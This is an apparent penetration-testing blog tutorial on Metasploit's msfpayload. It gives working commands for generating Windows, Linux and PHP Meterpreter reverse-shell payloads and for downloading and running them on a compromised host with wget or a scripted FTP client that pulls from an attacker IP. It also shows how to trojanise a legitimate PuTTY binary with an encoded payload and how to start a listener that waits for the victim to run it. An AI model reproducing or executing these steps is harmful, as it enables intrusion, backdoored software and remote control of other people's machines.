You are on page 1of 4

msfpayload and Backdooring EXEs

Msfpayload is part of the Metasploit framework and allows us to generate Metasploit


payloads into various formats. In our previous blog posts, we leveraged msfpayload to
generate raw shellcode that we leveraged in our buffer overflow for code execution.
Now we will go over some other use cases for msfpayload to generate some meterpreter
payloads. You will often find yourself wanting to upgrade your raw shell to a
meterpreter shell because you have a lot of increased functionality, or you may want to
backdoor a legit executable for persistence.
Create a Meterpeter payload to upgrade your raw shell:
1
2
3
# Windows Meterpreter Reverse Shell:
msfpayload windows/meterpreter/reverse_tcp LHOST=<Attacker_IP> LPORT=<Listener_port> X > win_meter.exe

4
5
6
7
8
# Linux x86 Meterpreter Reverse Shell:
msfpayload linux/x86/meterpreter/reverse_tcp LHOST=<Attacker_IP> LPORT=<Listener_port> X > lin_meter.exe

# PHP Meterpreter Reverse Shell:
msfpayload php/meterpreter_reverse_tcp LHOST=<Attacker_IP> LPORT=<Listener_port> R > php_meter.php
Pull Over Binary on Linux:
To upgrade your raw shell to meterpreter you can follow this process for Linux:
Optional: Spawn a Pseudo-Terminal with Python
To create a python HTTP server the built-in function SimpleHTTPServer can be
leveraged. You can invoke a module directly from the command line with switch -
m. By default the listener will start on port 8000, but you can specify the port youd like
to use as an argument:
1
2
python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 80 ...
Now assuming you dont have a firewall blocking connections you should be able to
issue requests to the server. You can place your meterpreter binary in the same
directory that you started the Python HTTP server and it should be accessible by a
remote client. Here is an example of how you might want to leverage wget. I find it very
common in cases where you land an initial web shell that you dont have permission to
write in the current working directory, and you lack the ability to change directories. So
to solve the problem you can do the following:
1
2
3
4
5
6
7
8
9
10
11
# Switch -O allows you to output to another directory - /tmp/ is often writable
wget -O /tmp/<meterpeter_binary> http://<attacker_ip>/<meterpeter_binary>

# Change permissions
chmod a+x /tmp/<meterpeter_binary>

# Always a good idea to make sure the file pulled over properly
file /tmp/<meterpeter_binary>

# Run the meterpreter binary
/tmp/<meterpeter_binary>

Pull Over Binary on Windows:
To upgrade your raw shell to meterpreter on Windows you can do some CLI Kung
Fu. This helps you get around the issues with raw shell and not handling certain
commands that require additional input:
1
2
3
4
5
6
7
8
9
10
11
# You can build up the FTP script line by line
# Don't spaces with username/passwords as they'll mess up authentication
C:\>echo open [attacker_ip] >> ftp.txt

C:\>echo [user]>>ftp.txt

C:\>echo [password]>>ftp.txt

C:\>echo get [meterpreter_binary]>>ftp.txt

C:\>echo bye >> ftp.txt
Now you can leverage the built-in Windows FTP client with switch -s and use your FTP
script file you created:
1
2
3
4
5
6
7
c:\>ftp -s:ftp.txt
ftp.exe -s:ftp.txt
User ([attacker_ip]:(none)): open [attacker_ip]
get [meterpreter_binary]
bye

c:\> dir /s | findstr [meterpreter_binary]
Now if you want to leverage msfpayload to backdoor a legitimate binary you can do the
following:
1
2
3
4
5
6
~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=443 R | msfencode -t exe -x /tmp/putty.exe -k -o putty_bad.exe -e x86/shikata_ga_nai -c 3
[*] x86/shikata_ga_nai succeeded with size 314 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 341 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 368 (iteration=3)
In this example we decided to backdoor PuTTY, but could have been any binary. Switch
-t specifies the output format, -x specifies an alternate executable template to use,
-o specifies the output file, and switch -e the encoded to use. Now we can plant the
backdoored executable on the victim machine, start up an listener, and test it out:
1
2
3
4
5
6
7
8
9
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.56.102
LHOST => 192.168.56.102
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.56.102:443
[*] Starting the payload handler...
10
Now assuming everything worked properly, when you click the PuTTY binary on the

victim machine you should see your Meterpreter session spawn:

You might also like